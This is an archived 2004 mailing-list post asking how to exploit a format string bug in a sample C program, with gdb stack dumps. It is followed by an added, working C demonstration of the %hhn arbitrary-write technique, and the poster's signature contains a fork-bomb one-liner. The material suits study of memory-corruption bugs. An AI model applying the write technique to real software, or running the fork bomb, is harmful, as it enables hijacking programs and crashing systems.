Vulnerability Development mailing list archives
Help, problems finding addresses with format strings
From: YeYu <yeyuno () bigfoot com>
Date: Thu, 19 Feb 2004 14:23:48 +0100
Hello,

Having some experience with BOF, I decided to read some docs about format string vulnerabilities, but... my surprise is that, for some reason, I can't find anything similar to this in the docs, so I'd like someone with some experience to help me. My system is Debian GNU/Linux sid with gcc 3.3.3.

Look at this simple (apparently) code:

---
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* bzero */
#include <unistd.h>

int main(void)
{
    char vuln[1024];

    bzero(vuln, 1024);
    printf("vuln program\n\n");
    printf("enter some string:");
    fflush(stdout);
    read(0, vuln, 1024);
    printf(vuln);   /* user input used directly as the format string */
    return 0;
}
---

We compile it and execute it... When the program asks for a string, we want to guess the stack region...

enter some string:%x %x %x %x
bffff4d0 400 2 25207825

These addresses are:

[x0riguer]:~/Projects/fstrings$ gdb -q ./fsvuln
(gdb) disas main
Dump of assembler code for function main:
0x08048424 <main+0>:    push   %ebp
0x08048425 <main+1>:    mov    %esp,%ebp
0x08048427 <main+3>:    sub    $0x418,%esp
...
...
0x08048499 <main+117>:  call   0x8048328
0x0804849e <main+122>:  leave
0x0804849f <main+123>:  ret
End of assembler dump.
(gdb) break *0x08048499
Breakpoint 2 at 0x8048499: file fsvuln.c, line 16.
(gdb) r
Starting program: /home/yeyu/Projects/fstrings/fsvuln
vuln program

enter some string:%x %x %x %x

Breakpoint 2, 0x08048499 in main () at fsvuln.c:16
16          printf(vuln);
(gdb) x/10wx $esp
0xbffff4c0:     0xbffff4d0      0xbffff4d0      0x00000400      0x00000002
0xbffff4d0:     0x25207825      0x78252078      0x0a782520      0x00000000
0xbffff4e0:     0x00000000      0x00000000
...

* If we can guess the string at 0xbffff4d0 ...
...
(gdb) x/s 0xbffff4d0
0xbffff4d0:      "%x %x %x %x\n"

Now... I think this is where char vuln[1024] starts, at 0xbffff4d0, no? I want to overwrite this buffer and theoretically overwrite main's return address with another one.

1- How can I guess (theoretically and practically) this return address on the stack? (I think it is on the stack.)
2- When I have the value of the return address, I think I have to overwrite it with techniques like %8x and %n, isn't it?

Help me to solve this problem please...
Thank you

-- 
=-------------------------------------------------=
** yn0 [yeyuno () bigfoot com] **
=------[ echo "\$0&\$0">_;chmod +x _;./_ ]--------=
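The "%8x ... %n" write that question 2 above asks about, shown as an added example that is not part of the original post or of the replies in this thread. It builds the format string that writes an arbitrary 32-bit value one byte at a time with %hhn, choosing the padding width of each %x so that printf's running character count has the right low byte when each %n fires. So that it runs stand-alone on any stack layout, the four target pointers are passed explicitly as positional arguments 1 to 4 and a dummy int as argument 5; in a real exploit those positions would be the stack slots you located by walking with "%x %x %x ..." (or "%N$x") and the pointers would sit inside the buffer itself. The value 0x08048424 used in main() is just main's address from the poster's disassembly, used as a sample target value; nothing here locates the saved return address, which is question 1 and depends on the binary.

```c
/* Added example (not from the original post). Demonstrates the
 * "%<pad>x ... %hhn" arbitrary write used in format string exploits.
 * glibc's fortified printf aborts on %n when the format string lives in
 * writable memory (exactly the attacker's situation), so fortification is
 * switched off for this file before the headers are included. */
#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Build a format string that writes 'value' into four consecutive bytes,
 * lowest address first, via four %hhn conversions.
 *
 * Assumed argument layout (an assumption of this example, not a rule):
 *   positional args 1..4 : pointers to the four target bytes
 *   positional arg  5    : a dummy int (0), printed only to produce padding
 *
 * %hhn stores (characters printed so far) mod 256, so for each byte we pick
 * a padding width pad = (want - printed) mod 256; a width of 0 would still
 * print one character ("0"), so a zero pad is bumped to 256, which leaves
 * the low byte of the count unchanged.
 *
 * Returns the total number of characters printf will emit. */
static size_t build_write_fmt(char *fmt, size_t fmtsz, uint32_t value)
{
    size_t written = 0;   /* characters printf has emitted so far */
    size_t pos = 0;       /* where the next chunk of the format goes */

    fmt[0] = '\0';
    for (int i = 0; i < 4; i++) {
        unsigned want = (value >> (8 * i)) & 0xff;   /* little-endian byte i */
        unsigned pad = (want - (written & 0xff)) & 0xff;
        if (pad == 0)
            pad = 256;

        if (pos >= fmtsz)
            return 0;     /* caller's buffer too small; never true for 128 bytes */
        /* emits e.g. "%5$36x%1$hhn": pad with arg 5, then store count via arg i+1 */
        pos += (size_t)snprintf(fmt + pos, fmtsz - pos, "%%5$%ux%%%d$hhn", pad, i + 1);
        written += pad;
    }
    return written;
}

/* Perform the write into a 4-byte target and return the bytes reassembled
 * little-endian, i.e. the value an x86 CPU would read back from that slot. */
static uint32_t demo_write(uint32_t value)
{
    unsigned char target[4] = {0, 0, 0, 0};
    char fmt[128];
    char out[1200];       /* at most 4 * 256 padding characters plus NUL */

    build_write_fmt(fmt, sizeof fmt, value);
    /* The attacker-controlled format is the one being "printed"; the %hhn
     * conversions write into target[] as a side effect of formatting. */
    snprintf(out, sizeof out, fmt, &target[0], &target[1], &target[2], &target[3], 0);

    return (uint32_t)target[0]
         | (uint32_t)target[1] << 8
         | (uint32_t)target[2] << 16
         | (uint32_t)target[3] << 24;
}

int main(void)
{
    uint32_t want = 0x08048424u;   /* sample value: main's address in the post */
    char fmt[128];
    size_t n = build_write_fmt(fmt, sizeof fmt, want);
    uint32_t got = demo_write(want);

    printf("format   : %s\n", fmt);
    printf("printed  : %zu characters\n", n);
    printf("wrote    : 0x%08x (%s)\n", got, got == want ? "ok" : "MISMATCH");
    return got == want ? 0 : 1;
}
```

For 0x08048424 the generated format is %5$36x%1$hhn%5$96x%2$hhn%5$128x%3$hhn%5$4x%4$hhn: 36 characters give 0x24, 96 more give 132 = 0x84, 128 more give 260 whose low byte is 0x04, and 4 more give 264 whose low byte is 0x08. The whole write costs 264 printed characters, which is why the byte-wise %hhn form is preferred over a single %n that would have to print 0x08048424 characters.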
Current thread:
- Help, problems finding addresses with format strings YeYu (Feb 19)
- <Possible follow-ups>
- Re: Help, problems finding addresses with format strings Vade 79 (Feb 20)
- Re: Help, problems finding addresses with format strings Marco Ivaldi (Feb 20)